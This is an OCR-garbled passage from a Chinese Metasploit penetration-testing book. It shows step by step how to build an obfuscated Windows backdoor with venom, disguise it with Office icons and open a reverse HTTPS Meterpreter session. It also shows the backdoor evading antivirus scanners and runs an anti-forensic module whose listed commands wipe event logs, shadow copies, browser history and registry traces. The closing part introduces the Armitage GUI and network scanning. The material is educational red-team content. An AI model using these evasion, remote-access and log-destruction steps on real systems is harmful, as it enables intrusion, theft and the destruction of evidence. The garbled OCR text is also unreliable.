Pedro Nobrega 和 Chaitanya Haritash ( Suspicious-Shell-Activity ) 的 杰作 ,他们 二 人 一 直人 致力 于 研究 在 
各 种 操作 系统 上 简化 外 壳 代 码 和 后 门 的 生成 。 单 击 回 车 以 继续 操作 。 




















NT NE 
VI LM MH T 


Nui CORANN 
USER:root ENV:vm INTERFACE:ethO ARCH:x64 DISTRO:Kali 


- Unix based payloads 

- Windows-0S payloads 

- Multi-0S payloads 

- Android|IOS payloads 

- Webserver payloads 

- Microsoft office payloads 

- System built-in shells 
| 
| 


NouvupwNPp 


- Exit Shellcode Generator 


SSA-RedTeam@2017_| 


[s] Shellcode Generator 
[»] Chose Categorie number:2 
[s] Loading Microsoft agents .. 


正如 你 在 上 图 中 看 到 的 那样 ， 这 里 按照 操作 系统 分 类 提供 了 各 种 攻击 载荷 ， 你 甚至 还 可 以 创建 可 
以 在 多 个 操作 系统 上 运行 的 攻击 载荷 。 我 们 首先 选择 选项 第 二 个 选项 “Windows-OS payloads”。 



































AGENT N?16: 

| TARGET SYSTEMS : Windows 

| SHELLCODE FORMAT  : C + PYTHON (uuid obfuscation) 
| AGENT EXTENSION : EXE 

| AGENT EXECUTION  : press to exec (exe) 

| DETECTION RATIO  : https://goo.gl/HgnSQW 














可 以 看 到 , Windows 类 型 的 操作 系统 支持 多 种 代理 。 我 们 选择 其 中 的 16 号 代理 , 它 是 C 和 Python 
的 组 合 (UUID 混淆 )。 接 下 来 ,我 们 需要 在 “Enter LHOST” 窗 口内 添加 一 个 卫 地 址 ， 如 下 图 所 示 。 











& Enter LHOST & o 


example: 192.168.0.126 





| 192.168.0.126| | 








| Cancel | OK | 














添加 完毕 之 后 , 我 们 将 会 看 到 两 个 和 它 相 类 似 的 窗口 ,其 中 一 个 需要 输入 的 是 LPORT, 另 一 个 需 
要 添加 输出 攻击 载荷 的 名 字 。 这 里 我 们 可 以 在 LPORT 里 面 输入 443 ， 在 输出 攻击 载荷 名 字 里 面 输入 
reverse_winhttps， 或 者 任何 合适 的 名 字 都 可 以 ， 如 下 图 所 示 。 

















& PAYLOAD NAME & o 


Enter payload output name 
example: shellcode 





masteringmetasploit| | 











| Cancel | OK | 
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接 下 来 ， 我 们 将 会 看 到 这 个 生成 过 程 已 经 开始 了 ， 我 们 需要 为 这 个 可 执行 文件 选择 一 个 图 标 。 


$ REPLACE AGENT ICON sè o 





Chose icon to use: 
ck | Optior 
*) Windows-Store.ico 
Windows-Logo.ico 
Microsoft-Word.ico 


Microsoft-Excel.ico 


Cancel | OK | 














venom 框架 将 会 启动 和 这 个 可 执行 文件 相 匹 配 的 handler， 如 下 图 所 示 。 











PAYLOAD MULTI-HANDLER eoo00 
HHHHHHH 


WHH 
2HHNH 
Nul 

AMH 


Hih 
Ht 
HHHH 
m 


httpsz//metasploit,com 





&] compile template.py -> masteringmetasploit.exe 

&] Start a multi-handler... 

&] Press [ctrl«c] or [exit] to 'exit' meterpreter shell 
©] Please dont test samples on virus total... 


当 这 个 文件 在 目标 上 执行 的 时 候 ， 我 们 将 会 得 到 如 下 的 图 示 。 


PAYLOAD MULTI-HANDLER 009 


+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 








AYLOAD => windows/meterpreter/reverse_winhttps 

HOST => 192,168.0.126 

PORT => 443 

landlerSSLCert => /root/venom/obfuscate/wwu,gmail .com,pem 

tagerVerifySSLCert => true 

nableStageEncoding => true 

tageEncoder => x85/shikata ga nai 

[*] Meterpreter will verify SSL Certificate with SHAL hash 058babdbi2fecd31839a37b53553b1f2a314afed 

[*] Started HTTPS reverse handler on https;//192,158,0,126:443 

[*] https://192,168,0,126:443 handling request from 192.168,0,103; (UUID; jwk3hxe1) Meterpreter will verify SSL Certificate 
With SHAL hash 058babdbi2fecd31839a37b69553b1f2a314afed 

[*] https://192,168,0,126:443 handling request from 192,168,0,103; (UUID: jwk3hxe1) Encoded stage with x86/shikata, ga nai 
[*] https://192,168,0,126:443 handling request from 192,168,0,103: (UUID: jwk3hxe1) Staging x85 payload (180854 bytes) ... 
[*] Meterpreter session 1 opened (192,168,0,126:443 -> 192,168,0,103:58025) at 2018-05-10 05:40:45 -0400 


ieterpreter > sysinfo 


onputer $ RNTIVIRUS-PC 
S : Windows 7 (Build 7601, Service Pack 1). 
Inchitecture x86 





ustem Language $ en US 
[Domain t WORKGROUP 
ogged On Users : 2 
dual : x86/windows 
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我 们 很 轻松 地 获得 了 目标 的 控制 权 。 我 们 看 到 venom 工具 在 很 多 场景 中 都 展示 了 极 大 的 威力 , 它 
提供 了 从 伪造 Gmail 的 SSL 链接 到 使 用 shikata_ga_nai 进行 编码 等 各 种 实用 功能 。 下 面 把 这 个 文 


件 放 到 http:/virscan.org/ 中 进行 检查 。 
































File information 





File Name : masteringmetasploit.exe (File not down) 
File Size :3150840 byte 

File Type :application/x-dosexec 
MD5:fadecb288ce36f95e8c3f121325a5ca2 


SHA1:5f3bb5be2b9a4b82a616e3d5d2d2c1583952bc781 


Scanner results 


Scanner results:296Scanner(s) (1/40)found malware! 
Time: 2018-05-10 17:33:56 (CST) 


G+ Share 


ahnlab 9.9.9 

antivir 1920 1.9.159.0 
antiy AVL SDK 2.0 

arcavir 1.0 2011 
asquared 9.0.0.4799 9.0.0.4799 
avast 170303-1 414 





EE 


2013-05-28 Found nothing 

7.14.56.84 Found nothing 29 
1970-01-01 Found nothing 3 
2014-05-30 Found nothing 8 
2015-03-08 Found nothing 1 
2017-03-03 Found nothing 22 











可 以 看 到 , 除了 一 个 杀毒 引擎 发 现 这 个 文件 是 一 个 后 门 程序 之 外 , 其 他 的 杀毒 引擎 都 没有 检测 到 。 
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Metasploit 中 提供 了 很 多 用 来 消除 入 侵 痕 迹 的 工具 。 











不 过 从 取证 的 角度 来 说 ， 这 些 工 具 没 有 触及 

















某 些 关键 部 分 ， 因此 会 暴露 一 些 关 于 入 侵 活动 的 行为 和 有 效 信息 。 互 联网 上 有 很 多 提供 了 自 定义 功能 


的 模块 。 它 们 中 的 一 部 分 实现 了 对 那些 关键 部 分 的 处 理 ， 

















但 是 另外 一 部 分 则 没有 。 我 们 要 研究 的 是 一 


个 反 取 证 模块 ， 它 提供 了 大 量 功能 ， 例 如 : 清除 事件 日 志 ， 清 除 日 志文 件 ， 操 控 注 册 表 、.Ink X 
件 、.tmp、.log、 浏 览 器 历史 、Prefetch Files (.pf), RecentDocs, ShellBags, Temp/Recent 文件 夹 以 及 








恢复 点 。Pedro Nobrega 是 这 个 模块 的 作者 ， 他 在 取证 方 画 








j 进 行 了 广泛 的 研究 。 他 从 取证 分 析 者 的 角度 
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思考 ， 从 而 开发 了 这 个 模块 。 可 以 从 https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/ 


auxiliarys/CleanTracks.rb 下 载 这 个 模块 ， 然 后 就 像 前 几 章 中 做 的 那样 ， 
命令 载 和 人 这 个 模块 。 也 可 以 将 这 个 文件 放置 到 post/windows/manage 








我 们 先 来 看 看 它 的 参数 。 





在 Metasploit 中 使 








用 loadpath 














目录 中 。 在 运行 这 个 模块 之 前 ， 





CLEANER => true 
DEL LOGS => true 


IGET SYS => true 
msf post(windows/manage/CleanTracks) > 目 





msf exploit(multi/handler) > use post/windows/manage/CleanTracks 
msf post(windows/manage/CleanTracks) > show options 


Module options (post/windows/manage/CleanTracks): 


msf post(windows/manage/CleanTracks) > set CLEANER true 
msf post(windows/manage/CleanTracks) > set DEL LOGS true 


msf post(windows/manage/CleanTracks) > set GET SYS true 


Name Current Setting Required Description 

CLEANER false no Cleans temp/prefetch/recent/flushdns/logs/restorepoints 
DEL LOGS false no Cleans EventViewer logfiles in target system 

GET SYS false no Elevate current session to nt authority/system 

LOGOFF false no Logoff target system (no prompt) 

PREVENT false no The creation of data in target system (footprints) 
SESSION 1 yes The session number to run this module on 








可 以 看 到 ， 在 这 个 模块 中 我 们 可 以 使 用 c 
行 这 个 模块 时 会 发 生 什么 。 




















LEANER、DEL_LOGS £i Gi 








msf post(windows/manag 


SESSION may not be 
da-aitecasasucac ue 

* CleanTra 
Author: Pedro 


| 
| 
| 
| Cover your foot 
| deleting prefet 
| tmp, dat, MRU, 
Running on session 
Computer 

Operative System 
Target UID 

Target IP addr 
Target Session Por 
Target idle time 
Target Home dir 
Target System Driv 
Target Payload dir 
Target Payload PID 


[* 


Running module aga 
Session UID: NT AU 


Impersonate token 
Impersonate token 
Impersonate token 
Impersonate token 
Impersonate token 
Impersonate token 





Elevate session to: 


je/CleanTracks) > run 


compatible with this module. 


cks - Anti-forensic * 
Ubuntu [ r00t-3xpl6it ] 


ch, cache, event logs, lnk 
shellbangs, recent, etc. 


* 
| 
| 
c | 
prints in target system by | 
| 
l 
和 + 
pa 

: WIN-6F09IRT3265 

: Windows 7 (Build 7600). 
: NT AUTHORITY\SYSTEM 

: 192.168.0.129 


t : 56346 

: 391 

: \Users\Apex 
e: C: 


: C:\Users\Apex\Downloads 
: 2056 


inst: WIN-6FO9IRT3265 


ITHORITYNSYSTEM 

nt authority/system 

=> SeBackupPrivilege 

=> SeChangeNotifyPrivilege 
=> SeCreateGlobalPrivilege 
=> SeCreatePagefilePrivilege 


=> SeCreateSymbolicLinkPrivilege 


=> SeDebugPrivilege 











现在 这 个 模块 正常 运行 着 。 我 们 来 查看 一 下 它 都 完成 了 哪些 工作 。 


ET_SYS 功能 。 下 面 看 看 当 执 
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Impersonate token => SeUndockPrivilege 


Current Session UID: NT AUTHORITYNSYSTEM 


Clear temp, prefetch, recent, flushdns cache 

cookies, shellbags, muicache, restore points 

Cleaning -» ipconfig /flushdns 

Cleaning DEL /q /f /s %temp%\*.* 

Cleaning DEL /q /f %windir%\*.tmp 

Cleaning DEL /q /f %windir%\*.log 

Cleaning DEL /q /f /s %windir®%\Temp\*.* 

Cleaning DEL /q /f /s *userprofile**.tmp 

Cleaning DEL /q /f /s *userprofile**.log 

Cleaning DEL /q /f *windir*NsystemV*. tmp 

Cleaning DEL /q /f *windir* system V*.log 

Cleaning DEL /q /f *windir*XSystem32V*. tmp 

Cleaning DEL /q /f *windir*WSystem32V*. log 

Cleaning DEL /q /f /s %windir%\Prefetch\*.* 

Cleaning vssadmin delete shadows /for-*ssystemdrive* /all /quiet 

Cleaning DEL /q /f /s *sappdata*MicrosoftWindowsNRecentV*. * 

Cleaning DEL /q /f /s *sappdata* Mozilla VFirefoxVProfilesV*.* 

Cleaning DEL /q /f /s *xappdata*MMicrosoftWindowsNVCookiesV*.* 

Cleaning DEL /q /f %appdata%\Google\Chrome\"User Data"\Default\*.tmp 

Cleaning DEL /q /f %appdata%\Google\Chrome\"User Data"\Default\History\*.* 

Cleaning DEL /q /f *appdata*XGoogleXChromeV"User Data" VDefaultNVCookiesV*.* 

Cleaning DEL /q /f %userprofile%\"Local Settings" V"Temporary Internet Files"\*.* 

Cleaning REG DELETE "HKCUNSoftwareMicrosoftWindowsVShellABags" /f 

Cleaning REG DELETE “HKCU\Software\Microsoft\Windows\Shell\BagMRU" /f 

Cleaning REG DELETE "HKCUVSoftwareMMicrosoftWindowsVShellNoRoamMBags" /f 

Cleaning REG DELETE "HKCUVSoftwareMMicrosoftWWindowsVShellNoRoam V BagMRU" /ff 

Cleaning REG DELETE "HKCUNSoftwareMMicrosoftWindowsNVCurrentVersionVExplorerNRunMRU" /f 
Cleaning REG DELETE "HKCUVSoftwareMMicrosoftWindowsVCurrentVersionNExplorerNUserAssist" /f 
Cleaning REG DELETE "HKCUVSoftwareMMicrosoft Windows VCurrentVersionNExplorerVComputerDescriptions" /f 
Cleaning REG DELETE "HKCU\Software\Classes\Local Settings VSoftwareMicrosoftWindowsVShellWMuiCache" /f 


可 以 看 到 ， 目 标 系统 中 的 日 志文 件 、 临 时 文件 以 及 资源 管理 记录 Cshellbag ) 都 会 被 清除 掉 。 为 了 
确保 这 个 模块 正常 工作 了 ， 我 们 可 以 看 看 下 图 ， 其 中 显示 了 在 这 个 模块 执行 之 前 的 日 志 关 


CT 



























































[Æ Computer Management Les [87 Te S 
File Action View Help 
e| ut 
F CEP Management (Local) Keywords Date and Time Source EventID Task Category ^ | | Actions 
4 Feel ^ Q, Audit Success 5/10/2018 2:04:17 PM Microsoft Window... 4672 Special Logon 国 Security ^ 
b ask Scheduler » : m. à = " 
JB Fes Vien Audit Success 5/10/2018 2:04:17 PM Microsoft Window.. 4624 Logon 5 Open Saved Log.. 
Q Audit Success 5/10/2018 2:04:06 PM Microsoft Window... 4672 Special Logon 
» E} Custom Views , Y Create Custom V.. 
x udit Success. :04:1 licroso! 'indow... ogon 
4 f. Windows Logs Q Audit S 5/10/2018 2:04:06 PM Microsoft Wind 4624 L 
国 Application Q Audit Success 5/10/2018 2:04:06 PM Microsoft Window... 4672 Special Logon Import Custom .. 
il Security. Q Audit Success 5/10/2018 2:04:06 PM Microsoft Window... 4624 Logon Clear Log.. 
E Setup Q Audit Success 5/10/2018 1:57:17 PM Microsoft Window... 4672 Special Logon Phir cunent Lo 
国 System Q Audit Success ^ 5/10/2018 1:57:17 PM Microsoft Window... 4624 Logon " 
E Forwarded Events Q Audit Success 5/10/2018 1:35:52 PM Microsoft Window... 4616 Security State Cha... Gj Properties 
p © Applications and Services Logs Q, Audit Success 5/10/2018 1:55:39 AM Microsoft Window... 4616 Security State Cha... 88 Find. 
Qui Subscriptions 9, Audit Success 5/7/2018 10:16:40 PM Microsoft Window... 4672 Special Logon ld Save All Events .. 
» Bl Shared Folders OQ Audit Success ^ 5/7/2018 10:16:40 PM Microsoft Window... 4624 Logon 
© 9 Attach a Task To. 
d Plon Audit Success 5/7/2018 7:35:08 PM Microsoft Window.. 4672 Special Logon 
a Pmi AERA, Q, Audit Success 5/7/2018 7:35:08 PM Microsoft Window... 4624 Logon View d 
fff Disk Mana net Q Audit Success 5/7/2018 6:52:41 PM Microsoft Window... 4672 Special Logon 回 Refresh 
, Bb Services and Applications Q Audit Success 5/7/2018 6:52:41 PM Microsoft Window... 4624 Logon Help » 
Q Audit Success 5/7/2018 6:31:38 PM Microsoft Window... 4905 Audit Policy Change 
Q Audit Success 5/7/2018 6:31:38 PM Microsoft Window... 4904 Audit Policy Change ~ | Event 4672, Microsof.. 全 
Event 4672, Microsoft Windows security auditing. x | 国 Event Properties 








General [Details | © Attach Task To T... 








H& Copy > 
[Special privileges assigned to new logon. ^ B] Seve Selociod Ev. 
回 Refresh 
Log Name: Security 
Source: Microsoft Windows ser Logged: 5/10/2018 2:04:17 PM H Hep E 
Event ID: 4672 Task Category: Special Logon 
Level: Information Keywords: Audit Success 
User: N/A Computer: WIN-6FO9IRT3265 
OpCode: Info 


More Information: Event Log Online 


[goonie uns) 
a ciui 





























^ 
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该 模块 执行 之 后 ， 系 统 中 的 日 志 状 态 就 会 发 生变 化 ， 如 下 图 所 示 。 


[Æ Computer Management pem —»x-—7] 


File Action View Help 


€ 9|23 BE 






































E Compie Management (Local) Keywords Date and Time Source EventID Task Category Actions 
^ W System Tools Audit Success 5/10/2018 6:24:44 PM Eventlog 1102 Log clear Security P 
> @ Task Scheduler -一 一 -一 
4 国 Event Viewer i$ Open Saved Log... 
3 Custom Views Y Create Custom V.. 
4 EÈ Windows Logs 
B Acron Import Custom .. 
国 Security Clear Log... 
El Setup Y Filter Current Lo... 
E System E 
£ Forwarded Events (J Properties 
号 Applications and Services Logs 89 Find.. 
à Subscriptions ld Save All Events .. 
» & Shared Folders 
© Performance Attach a Task To... 
il Device Manager View > 
4 3 Storage 
& 
& Disk Management S Refresh 
> Es Services and Applications H Help » 
Event.1102, Eventjog as 
Event 1102, Eventlog x | 国 Event Properties 
General [Details | © Attach Task To T... 
E& Copy > 
The audit log was cleared. ^ E) Save Selected Ev. 
Subject: - 
回 Refresh 
Log Name: Security a FeR " 
Source: Eventlog Logged: 5/10/2018 6:24:44 PM 
Event ID: 1102 Task Category: Log clear 
Level: Information Keywords. Audit Success 
User. N/A Computer — WIN-6FOSIRT3265 
OpCode: Info 


More Information: Event Log Online 





























eldge!e|s sad Jj 
除了 在 上 图 中 看 到 的 部 分 之 外 ， 这 个 模块 最 棒 的 地 方 是 它 的 高 级 选项 。 


msf post(windows/manage/CLeanTracks) > show advanced 











Module advanced options (post/windows/manage/CleanTracks): 


Name Current Setting Required Description 

DIR MACE no Blank MACE of any directory inputed (eg: %windir%\\system32) 
PANIC false no Use this option as last resource (format NTFS systemdrive) 
REVERT false no Revert regedit policies in target to default values 

VERBOSE false no Enable detailed status messages 

WORKSPACE no Specify the workspace for this module 











选项 DIR_MACE 的 值 可 以 为 目标 系统 上 的 任意 目录 , 利用 模块 可 以 修改 这 个 目录 中 所 有 文件 的 修 
改 、 访 问 和 创建 时 间 戳 。 选 项 PANIC 用 来 格式 化 NTFS 格式 的 系统 盘 ， 因 此 这 个 操作 是 很 危险 的 。 选 
项 REVERT 可 以 将 目标 系统 的 大 部 分 策略 都 恢复 成 初始 值 。 而 PREVENT 选项 将 尝试 通过 设置 这 些 值 
来 避免 目标 系统 上 日 志 的 创建 和 数据 的 生成 。 这 个 功能 极为 有 用 ， 对 执法 机 构 而 言 尤 其 如 此 。 























10.6 ”小结 


本 章 介绍 了 一 些 可 以 为 执法 机 构 提 供 帮 助 的 专用 工具 和 技术 。 不 过 ， 这 些 技术 必须 谨慎 使 用 ， 
为 某 些 法 律 可 能 会 限制 你 使 用 这 些 技术 。 我 们 讨论 了 如 何 实现 Meterpreter 会 话 的 代理 ， 研 究 了 很 多 
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APT 技术 ， 例 如 获取 持久 性 的 控制 ， 从 目标 系统 获取 文件 ， 使 用 venom 实现 对 攻击 载荷 的 代码 混淆 ， 
以 及 使 用 Metasploit 的 第 三 方 反 取证 模块 来 掩盖 入侵 的 痕迹 。 


a 


尝试 进行 下 面 的 练习 。 











口 尝试 使 用 Metasploit aggregator 模块 作为 代理 。 
口 完成 代码 打 洞 技术 的 练习 ， 并 尝试 在 不 破坏 源 程序 的 前 提 下 ， 将 攻击 载荷 绑 定 到 合法 的 DLL 
文件 上 。 








口 制作 一 个 自 定 义 的 后 渗透 模块 ， 用 来 实现 DLL 注入 。 
在 下 一 章 中 ,我 们 将 会 介绍 


大 名 易 易 的 Armitage， 同 时 建立 红 队 的 测试 环境 ， 并 使 用 自 定义 的 脚 
本 来 充分 发 挥 Armitage 的 作用 。 




















第 11 章 
利用 Armitage Sc Zl Metasploit 


的 可 视 化 管理 























上 一 章 介 绍 了 Metasploit 如 何在 执法 机 构 中 发 挥 作用 。 接 下 来 学 习 另 一 个 优秀 的 工具 ， 使 用 这 个 
工具 不 仅 能 提高 渗透 测试 的 效率 ， 还 能 为 测试 团队 提供 一 个 大 型 的 红 队 环境 。 

Armitage 是 一 个 图 形 化 操作 工具 ， 用 作 Metasploit 的 攻击 管理 工具 。Armitage 实现 了 Metasploit 
所 有 操作 的 可 视 化 ， 也 会 根据 情况 给 出 建议 。Armitage 还 是 进行 Metasploit 访问 共享 和 团队 管理 工作 
的 有 力 工 具 。 


本 章 将 介绍 Armitage 及 其 功能 ， 并 将 深入 探讨 如 何 使 用 Metasploit 的 这 个 可 视 化 工具 进行 渗透 测 
试 。 本 章 的 后 半 部 分 还 会 介绍 如 何 编写 Armitage 的 Cortana 脚本 。 

本 章 将 着 眼 于 以 下 几 个 要 点 。 
口 使 用 Armitage 进行 渗透 测试 。 
口 网 络 扫描 以 及 主机 管理 。 
口 {EH Armitage 进行 后 渗透 测试 。 
口 使 用 团队 服务 器 实现 红 队 协同 工作 。 
口 Cortana 脚本 的 基础 知识 。 
O 在 Armitage 中 使 用 Cortana 脚本 进行 攻击 。 


好 了 ， 和 Armitage 携手 开始 这 段 渗 透 测试 的 旅程 吧 。 


11.1 Armitage 的 基本 原理 


Armitage 是 一 个 攻击 管理 工具 ， 它 以 图 形 化 方式 实现 了 Metasploit 框架 的 自动 化 攻击 。Raphael 
Mudge 采用 Java 构建 了 Armitage， 它 拥有 跨 平 台 的 特性 ， 因 此 可 以 在 Windows 和 Linux 这 些 不 同 的 
操作 系统 上 运行 。 


















































































































































11.1.1 ATIR 
在 本 章 中， 我们 将 在 Kali Linux 环境 下 使 用 Armitage。 启 动 Armitage 的 步 又 如 下 所 示 。 





11.1 Armitage 的 基本 原理 


fF 一 个 Linux 终端 ， 然 后 在 其 中 输入 命令 armitage， 如 下 图 所 示 。 
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File Edit View Search Terminal Help 
root@Apex: ~# armitage 























test 








| Connect Help 

















(2) 这 时 会 弹出 一 个 对 话 框 ， 单 击 对 话 框 上 的 Connect 按钮 来 建立 一 个 到 Metasploit 的 连接 。 


(3) 为 了 运行 armitage 命令 ，Metasploit 中 的 远程 过 程 调用 ( Remote Procedure Call, RPC ) 服务 
器 必须 先 运行 起 来 。 在 之 前 的 弹出 对 话 村 


匡 中 单 击 Connect 按钮 后 ， 一 个 新 的 对 话 框 就 会 弹出 来 。 这 个 
对 话 框 会 问 我 们 是 否 想 启 动 Metasploit 的 RPC 服务 。 单 击 如 下 屏幕 截图 中 的 Yes 按钮 。 























Start Metasploit? 


A Metasploit RPC server is not running or 

Q not accepting connections yet. Would you 
like me to start Metasploit's RPC server 
for you? 


Lao ) ess) 




















(4) 需要 花费 一 点 时 间 等 待 Metasploit 的 RPC 服务 启动 并 运行 起 来 。 在 这 个 过 程 中 ， 我 们 将 会 看 


到 消息 Connection refused 不 断 出 现 。 出 现 这 些 错误 是 因为 Armitage 一 直 在 测试 到 目标 的 连接 是 否 已 
经 建立 。 我 们 可 以 看 到 这 样 的 错误 ， 如 下 面 的 屏幕 截图 所 示 。 




















Progress... 


Connecting to 127.0.0.1:55553 
java.net.ConnectException: Connection refused 











Cancel 














下 面 是 一 些 在 启动 Armitage 时 需要 注意 的 地 方 。 
口 你 必须 使 用 一 个 root 用 户 权限 进行 工作 。 
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O 在 Kali Linux 环境 下 工作 时 ， 如 果 当 前 系统 没有 安装 Armitage， 可 以 使 用 apt-get install 





armitage 命令 来 安装 这 个 工具 。 





当 出 现 Armitage 无 法 找到 数据 库 文件 的 时 候 ， 就 需要 确认 Metasploit 数据 库 是 否 已 初 
&5 始 化 并 正确 运行 。 这 个 数据 库 可 以 使 用 msfqb init 命令 初始 化 , 使 用 msfqdb start 


命令 启动 。 


11.1.2 ”用 户 界面 一 鉴 























如 果 与 Metasploit 的 连接 正确 无 误 地 建立 了 ， 我 们 就 可 以 看 到 Armitage 的 界面 了 。 这 个 界面 看 起 





来 如 下 图 所 示 。 





Armitage View Hosts Attacks Workspaces Help 


















» s auxiliary 
» @ exploit 
* 篇 payload 
» A] post 


















一 一 x 





=[ me .16.7-dev 
—— 68 i - 964 auxiliary - 
98 


40 encoders - 10 
ree Metasploit Pro trial: http:// 

















Armitage 的 界面 很 简单 ， 主 要 包含 了 三 个 不 同 的 窗 格 部 分 。 让 我 们 来 仔细 看 看 这 三 个 窗 格 各 自 的 

















作用 。 





口 右上 角 的 第 一 个 窗 格 包含 了 Metasploit 中 的 所 有 功能 模块 的 引 
块 、 攻 击 载 荷 模块 和 后 渗透 模块 。 我 们 可 以 浏览 每 一 个 模块 ， 然 后 双击 启动 。 此 外 ， 在 第 一 




















个 窗 格 的 最 下 面 有 一 个 很 小 的 输入 框 ， 可 以 使 ) 
构 中 不 停 地 通过 单 击 进行 选择 。 

































































] ,这 包括 了 辅助 模块 、 渗 透 模 











] 它 来 快速 搜索 需要 的 模块 ， 而 不 必 在 层次 结 














口 第 二 个 窗 格 显示 了 网 络 中 当前 所 有 在 线 的 计算 机 。 这 个 窗 格 通常 会 以 特定 的 格式 图 标 来 显示 




















计算 机 。 例 如 ， 安 装着 Windows 操作 系统 的 计算 机 显示 为 一 个 在 显示 器 处 有 Windows 徽标 的 
计算 机 图 标 。 类 似 地 ，Linux 徽标 代表 着 Linux 操作 系统 ， 其 他 徽标 用 来 标识 其 他 系统 〈 例如 
Mac 等 )。 打 印 机 会 被 标识 为 一 个 打印 机 形象 的 图 标 。 这 种 表示 方法 形象 地 帮助 我 们 识别 了 网 





络 中 的 设备 类 型 。 
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口 第 三 个 窗 格 可 以 完成 所 有 的 操作 、 后 渗透 过 程 、 扫 描 过 程 、Metasploit 的 命令 行 ， 以 及 处 理 后 
渗透 模块 返回 的 结果 。 





11.1.3 工作 区 的 管理 


正如 我 们 在 前 几 章 中 看 到 的 那样 ， 工 作 区 是 用 来 保存 各 种 不 同 的 攻击 文件 的 。 假 设 我 们 当前 正在 
攻击 指定 范围 的 计算 机 ， 可 是 由 于 某 些 突 发 原因 ， 不 得 不 停 下 来 转 而 去 测试 另外 一 个 范围 的 计算 机 。 
在 这 种 情形 下 ， 可 以 创建 一 个 新 的 工作 区 去 测试 新 目标 范围 的 计算 机 ， 这 样 做 保证 了 测试 结果 的 整洁 
有 序 。 因 此 ， 在 完成 这 个 工作 区 的 测试 工作 以 后 ， 可 以 切换 到 其 他 工作 区 。 工 作 区 在 切换 时 可 以 自动 
载 人 之 前 保存 过 的 相关 工作 内 容 。 这 个 功能 可 以 实现 在 进行 大 量 扫描 工作 时 单独 保存 每 个 目标 的 扫描 
结果 。 这 样 就 避免 了 各 种 扫描 结果 杂乱 无 章 地 混在 一 起 。 

如 果 想 要 创建 一 个 新 的 工作 区 ， 首 先导 航 到 Workspaces 选项 卡 ， 然 后 单 击 Manage。 这 样 做 将 会 
在 Armitage 中 产生 一 个 新 的 Workspaces 选项 卡 ， 如 下 面 的 屏幕 截图 所 示 。 















































































































































name | hosts | ports os | labels | session 




















| Activate | | Add | | Edit | | Remove 














这 个 新 的 选项 卡 在 Armitage 的 第 三 个 窗 格 中 出 现 ， 它 可 以 帮助 我 们 展示 所 有 关于 工作 区 的 信息 。 
目前 在 这 里 还 看 不 到 任何 东西 ， 因 为 我 们 暂时 还 没有 创建 任何 工作 区 。 


现在 来 创建 一 个 新 的 工作 区 。 首 先 单 击 Add 按钮 ， 如 下 面 的 屏幕 截图 所 示 。 




















New Workspace eoo0 


Name: Internal Scan 
Hosts: 192.168.10.0/24 
OS: 


Labels: 





O Hosts with sessions only 


Add 
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我 们 可 以 添加 任意 名 称 的 工作 区 ， 比 如 一 个 为 192.168.10.0/24 的 内 部 地 址 范 目 
完 测试 范围 之 后 的 Workspaces 选项 卡 。 





。 下面 给 出 了 添加 


zu 























^ 


[console x [workspaces X] 


name | hosts 
Internal Scan 192.168.10.0/24 








| 
可 以 随时 切换 工作 区 。 只 需 选 中 要 操作 的 工作 区 ， 然 后 单 击 Activate 按钮 即 可 。 


11.2 ”网 络 扫描 以 及 主机 管理 


Armitage 中 使 用 独立 的 Hosts 选项 卡 来 实现 主机 的 管理 操作 和 主机 的 扫描 操作 。 可 以 单 击 导航 栏 
上 Hosts 的 按钮 选项 , 然后 选中 下 拉 菜 单 中 的 Import Hosts 选项 从 文件 中 导入 主机 。 也 可 以 在 Hosts 中 
选中 Add Host， 手 动 导 人 一 台 主 机 。 


Armitage 也 提供 主机 扫描 的 选项 。 这 些 扫 描 分 成 了 两 种 类 型 : Nmap 扫描 (Nmap scan) fll MSF 
扫描 (MSF scan ) MSF 扫描 可 以 使 用 Metasploit 中 的 大 量 端口 和 服务 扫描 模块 。Nmap 扫描 则 可 以 使 
用 当前 最 为 流行 的 端口 扫描 工具 Network Mapper ( Nmap )。 

选中 hosts 选项 卡 的 MSF scan 选项 对 网 络 进 行 扫描 。 不 过 点 击 MSF scan 之 后 ，Armitage 会 弹出 
一 个 对 话 框 。 这 里 需要 填写 一 个 目标 范围 ， 如 下 面 的 屏幕 截图 所 示 。 






































































































































Input 
Enter scan range (e.g., 192.168.1.0/24): 
|192.168.10.0/24 | 
Cancel OK 














输入 目标 的 地 址 范围 以 后 , Nmap 会 对 目标 范围 内 所 有 主机 的 端口 、 服 务 以 及 操作 系统 进行 扫描。 
可 以 在 界面 的 第 三 个 窗 格 中 看 到 扫描 的 详细 信息 ， 如 下 图 所 示 。 











zu 


























Console X | Workspaces X | Scan X 


msf auxiliary(smb version) » set RHOSTS 192.168.10.1, 192.168.10.110, 192.168.10.105, 192.168.10.109 

RHOSTS => 192.168.10.1, 192.168.10.110, 192.168.10.105, 192.168.10.109 

msf auxiliary(smb version) » run -j 

[*] Auxiliary module running as background job 

[*] 192.168.10.110:445 is running Windows 2012 R2 Standard (build:9600) (name:WIN-3KOU2TI.J4E0) (domain:WIN-3KOU2TI.J4E0) 
[*] 192.168.10.109:445 is running Windows 2008 Web SP1 (build:6001) (name:WIN-SWIKKOTKSHX) (domain:WORKGROUP) 

[*] 192.168.10.105:445 is running Windows 10 Pro (build:10586) (name:DESKTOP-PESQ21S) (domain:WORKGROUP) 

[*] 192.168.10.1:445 could not be identified: Unix (Samba 3.0.14a) 

[*] Scanned 4 of 4 hosts (100% complete) 








[*] 1 scan to go... 

msf auxiliary(smb version) » use scanner/winrm/winrm auth methods 

msf auxiliary(winrm auth methods) » set THREADS 24 

THREADS => 24 

msf auxiliary(winrm auth methods) » set RPORT 5985 

RPORT => 5985 

msf auxiliary(winrm auth methods) » set RHOSTS 192.168.10.110 

RHOSTS => 192.168.10.110 

msf auxiliary (winrm auth methods) > run -j 

[*] Auxiliary module running as background job 
192.168.10.110:5985: Negotiate protocol supported 

[*] Scanned 1 of 1 hosts (100% complete) 


[*] Scan complete in 241.78s 
msf auxiliary (winrm auth methods) » 
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在 扫描 结束 后 ,每 个 目标 网 络 的 主机 都 会 以 图 





决 于 设备 和 操作 系统 的 类 型 


1 





pa 











在 上 


一 下 目标 上 运行 的 服务 。 





11.2.1 漏洞 的 建 模 


uU 


92.168.10.110 





192.168.10.105 


标的 形式 展示 在 第 二 个 窗 格 中 。 这 些 图 标的 样式 取 








192.168.10.109 


中 可 以 看 到 Windows Server 2008、Windows Server 2012 和 Windows 10 系统 。 接 下 来 查看 


